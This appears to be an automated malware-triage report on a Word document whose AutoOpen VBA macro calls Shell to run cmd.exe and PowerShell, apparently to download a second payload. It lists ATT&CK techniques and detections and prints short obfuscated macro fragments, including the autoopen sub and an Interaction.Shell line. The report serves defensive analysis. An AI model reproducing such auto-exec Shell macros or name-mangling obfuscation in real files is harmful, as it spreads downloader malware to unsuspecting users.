Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine that triggers a Shell() call. This call is used to invoke cmd.exe with obfuscated arguments, indicating an attempt to download and execute a secondary payload. The presence of PowerShell references and the ClamAV detection further support its malicious nature as a downloader.
Heuristics (10)

- ClamAV: Doc.Downloader.Generic-6775363-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6775363-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:

  ```vba
  hCndwi = Array(PrdORzDNI, djnTLFXlP, KzEGKrwpb, Interaction _
      .Shell(spkVli, LJdSY), lkECPocrA)
  PfbDEhwBzBIjMccGYFcpP = 59935802 * CInt(240108314) + lzAjriZmSkpOVjfzRBkn + CLng(1063305 + Sgn(MnVUGojwWFvwSEhNJPcV) - 106937115 * 182349265) - OlracXOYzfFnMNWblDUOjT + Chr(OaRErULiPkBGjOOGaIh) * 326771826 / CStr(112061872) / (RVznnqRvNDuLczKT / 146851802 / mApCLGnMXzuGCV / Fix(BJwEEjUNUXzMXlO + Hex(GldLQXOKszbTUBGBYDbqOPRX) + 118170583 + CBool(260911905 + fNuPaIBoUZKsiumLEF)))
  ```

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:

  ```vba
  Attribute VB_Customizable = True
  Sub autoopen()
  imZGF
  ```

- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8128 bytes |

SHA-256: 6c036c0611514af8774b2ef19085aaadd3a2731f37de47ae953443cb32363a0a

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 189 of 228 identifiers look randomly generated (e.g. 'kGcrMJGKozXGJEOVBjzdwwon'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script (macros.bas)